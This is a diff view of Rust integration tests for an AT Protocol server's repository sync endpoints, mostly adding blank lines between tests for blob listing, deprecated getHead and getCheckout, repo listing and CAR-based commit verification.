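// expect (scheme prefix plus a multibase-encoded public key).
fn looks_like_did_key(value: &str) -> bool {
    value
        .strip_prefix("did:key:")
        .map(|rest| rest.starts_with('z') && rest.len() > 1)
        .unwrap_or(false)
}
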
+4
tests/sync_blob.rs
···
3
use reqwest::StatusCode;
4
use reqwest::header;
5
use serde_json::Value;
6
#[tokio::test]
7
async fn test_list_blobs_success() {
8
let client = client();
···
35
let cids = body["cids"].as_array().unwrap();
36
assert!(!cids.is_empty());
37
}
38
#[tokio::test]
39
async fn test_list_blobs_not_found() {
40
let client = client();
···
52
let body: Value = res.json().await.expect("Response was not valid JSON");
53
assert_eq!(body["error"], "RepoNotFound");
54
}
55
#[tokio::test]
56
async fn test_get_blob_success() {
57
let client = client();
···
91
let body = res.text().await.expect("Failed to get body");
92
assert_eq!(body, blob_content);
93
}
94
#[tokio::test]
95
async fn test_get_blob_not_found() {
96
let client = client();
···
3
use reqwest::StatusCode;
4
use reqwest::header;
5
use serde_json::Value;
6
+
7
#[tokio::test]
8
async fn test_list_blobs_success() {
9
let client = client();
···
36
let cids = body["cids"].as_array().unwrap();
37
assert!(!cids.is_empty());
38
}
39
+
40
#[tokio::test]
41
async fn test_list_blobs_not_found() {
42
let client = client();
···
54
let body: Value = res.json().await.expect("Response was not valid JSON");
55
assert_eq!(body["error"], "RepoNotFound");
56
}
57
+
58
#[tokio::test]
59
async fn test_get_blob_success() {
60
let client = client();
···
94
let body = res.text().await.expect("Failed to get body");
95
assert_eq!(body, blob_content);
96
}
97
+
98
#[tokio::test]
99
async fn test_get_blob_not_found() {
100
let client = client();
+14
tests/sync_deprecated.rs
···
use helpers::*;
use reqwest::StatusCode;
use serde_json::Value;
+
#[tokio::test]
async fn test_get_head_success() {
    let client = client();
···
    let root = body["root"].as_str().unwrap();
    assert!(root.starts_with("bafy"), "Root CID should be a CID");
}
+
#[tokio::test]
async fn test_get_head_not_found() {
    let client = client();
···
    assert_eq!(body["error"], "HeadNotFound");
    assert!(body["message"].as_str().unwrap().contains("Could not find root"));
}
+
#[tokio::test]
async fn test_get_head_missing_param() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
+
#[tokio::test]
async fn test_get_head_empty_did() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "InvalidRequest");
}
+
#[tokio::test]
async fn test_get_head_whitespace_did() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
+
#[tokio::test]
async fn test_get_head_changes_after_record_create() {
    let client = client();
···
    let head2 = body2["root"].as_str().unwrap().to_string();
    assert_ne!(head1, head2, "Head CID should change after record creation");
}
+
#[tokio::test]
async fn test_get_checkout_success() {
    let client = client();
···
    assert!(!body.is_empty(), "CAR file should not be empty");
    assert!(body.len() > 50, "CAR file should contain actual data");
}
+
#[tokio::test]
async fn test_get_checkout_not_found() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "RepoNotFound");
}
+
#[tokio::test]
async fn test_get_checkout_missing_param() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
+
#[tokio::test]
async fn test_get_checkout_empty_did() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
+
#[tokio::test]
async fn test_get_checkout_empty_repo() {
    let client = client();
···
    let body = res.bytes().await.expect("Failed to get body");
    assert!(!body.is_empty(), "Even empty repo should return CAR header");
}
+
#[tokio::test]
async fn test_get_checkout_includes_multiple_records() {
    let client = client();
···
    let body = res.bytes().await.expect("Failed to get body");
    assert!(body.len() > 500, "CAR file with 5 records should be larger");
}
+
#[tokio::test]
async fn test_get_head_matches_latest_commit() {
    let client = client();
···
    let latest_cid = latest_body["cid"].as_str().unwrap();
    assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
}
+
#[tokio::test]
async fn test_get_checkout_car_header_valid() {
    let client = client();
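Note: com.atproto.sync.getHead and com.atproto.sync.getCheckout are deprecated in the atproto lexicons in favor of getLatestCommit and getRepo, which is why these tests are grouped in sync_deprecated.rs. A minimal getHead query, as a sketch only (base URL and DID are assumptions):

// Sketch, not from this diff: the deprecated getHead query returns the repo's
// current root CID as {"root": "..."} on success.
#[tokio::test]
async fn sketch_get_head() {
    let res = reqwest::Client::new()
        .get("http://localhost:3000/xrpc/com.atproto.sync.getHead")
        .query(&[("did", "did:plc:example")])
        .send()
        .await
        .expect("Failed to send request");
    let body: serde_json::Value = res.json().await.expect("Response was not valid JSON");
    // Either a root CID (success) or an error code, depending on the repo.
    assert!(body["root"].is_string() || body["error"].is_string());
}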
+18
tests/sync_repo.rs
···
use reqwest::StatusCode;
use reqwest::header;
use serde_json::{Value, json};
+
#[tokio::test]
async fn test_get_latest_commit_success() {
    let client = client();
···
    assert!(body["cid"].is_string());
    assert!(body["rev"].is_string());
}
+
#[tokio::test]
async fn test_get_latest_commit_not_found() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "RepoNotFound");
}
+
#[tokio::test]
async fn test_get_latest_commit_missing_param() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
+
#[tokio::test]
async fn test_list_repos() {
    let client = client();
···
    assert!(repo["head"].is_string());
    assert!(repo["active"].is_boolean());
}
+
#[tokio::test]
async fn test_list_repos_with_limit() {
    let client = client();
···
    let repos = body["repos"].as_array().unwrap();
    assert!(repos.len() <= 2);
}
+
#[tokio::test]
async fn test_list_repos_pagination() {
    let client = client();
···
        assert_ne!(repos[0]["did"], repos2[0]["did"]);
    }
}
+
#[tokio::test]
async fn test_get_repo_status_success() {
    let client = client();
···
    assert_eq!(body["active"], true);
    assert!(body["rev"].is_string());
}
+
#[tokio::test]
async fn test_get_repo_status_not_found() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "RepoNotFound");
}
+
#[tokio::test]
async fn test_notify_of_update() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::OK);
}
+
#[tokio::test]
async fn test_request_crawl() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::OK);
}
+
#[tokio::test]
async fn test_get_repo_success() {
    let client = client();
···
    let body = res.bytes().await.expect("Failed to get body");
    assert!(!body.is_empty());
}
+
#[tokio::test]
async fn test_get_repo_not_found() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "RepoNotFound");
}
+
#[tokio::test]
async fn test_get_record_sync_success() {
    let client = client();
···
    let body = res.bytes().await.expect("Failed to get body");
    assert!(!body.is_empty());
}
+
#[tokio::test]
async fn test_get_record_sync_not_found() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "RecordNotFound");
}
+
#[tokio::test]
async fn test_get_blocks_success() {
    let client = client();
···
        Some("application/vnd.ipld.car")
    );
}
+
#[tokio::test]
async fn test_get_blocks_not_found() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::NOT_FOUND);
}
+
#[tokio::test]
async fn test_sync_record_lifecycle() {
    let client = client();
···
        "Second post should still be accessible"
    );
}
+
#[tokio::test]
async fn test_sync_repo_export_lifecycle() {
    let client = client();
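Note: several of these tests poke at the com.atproto.sync.getLatestCommit response field by field. A typed variant of that check, as a sketch only (struct name, base URL, and DID are assumptions, not part of this change):

// Sketch, not from this diff: deserialize getLatestCommit into a typed struct
// instead of asserting on loose JSON fields.
#[derive(serde::Deserialize)]
struct LatestCommit {
    cid: String,
    rev: String,
}

#[tokio::test]
async fn sketch_latest_commit_typed() {
    let commit: LatestCommit = reqwest::Client::new()
        .get("http://localhost:3000/xrpc/com.atproto.sync.getLatestCommit")
        .query(&[("did", "did:plc:example")])
        .send()
        .await
        .expect("Failed to send request")
        .json()
        .await
        .expect("Response was not valid JSON");
    assert!(!commit.cid.is_empty());
    assert!(!commit.rev.is_empty());
}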
+3
tests/verify_live_commit.rs
···
use std::collections::HashMap;
use std::str::FromStr;
mod common;
+
#[tokio::test]
async fn test_verify_live_commit() {
    let client = reqwest::Client::new();
···
        }
    }
}
+
fn commit_unsigned_bytes(commit: &jacquard_repo::commit::Commit<'_>) -> Vec<u8> {
    #[derive(serde::Serialize)]
    struct UnsignedCommit<'a> {
···
    };
    serde_ipld_dagcbor::to_vec(&unsigned).unwrap()
}
+
fn parse_car(cursor: &mut std::io::Cursor<&[u8]>) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> {
    use std::io::Read;
    fn read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> {
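Note: the diff cuts off at the read_varint helper's signature, so its body is not shown here. For orientation only, CARv1 frames each section with an unsigned LEB128 varint length prefix, and a reader of that shape typically looks like the sketch below (illustrative, not necessarily the implementation elided above).

// Sketch, not the elided body: a typical unsigned LEB128 varint reader of the
// kind CARv1 parsers use for section length prefixes.
use std::io::Read;

fn sketch_read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> {
    let mut value: u64 = 0;
    let mut shift = 0u32;
    loop {
        let mut byte = [0u8; 1];
        r.read_exact(&mut byte)?;
        // Low 7 bits carry payload; the high bit marks a continuation byte.
        value |= u64::from(byte[0] & 0x7f) << shift;
        if byte[0] & 0x80 == 0 {
            return Ok(value);
        }
        shift += 7;
        if shift >= 64 {
            return Err(std::io::Error::new(
                std::io::ErrorKind::InvalidData,
                "varint too long for u64",
            ));
        }
    }
}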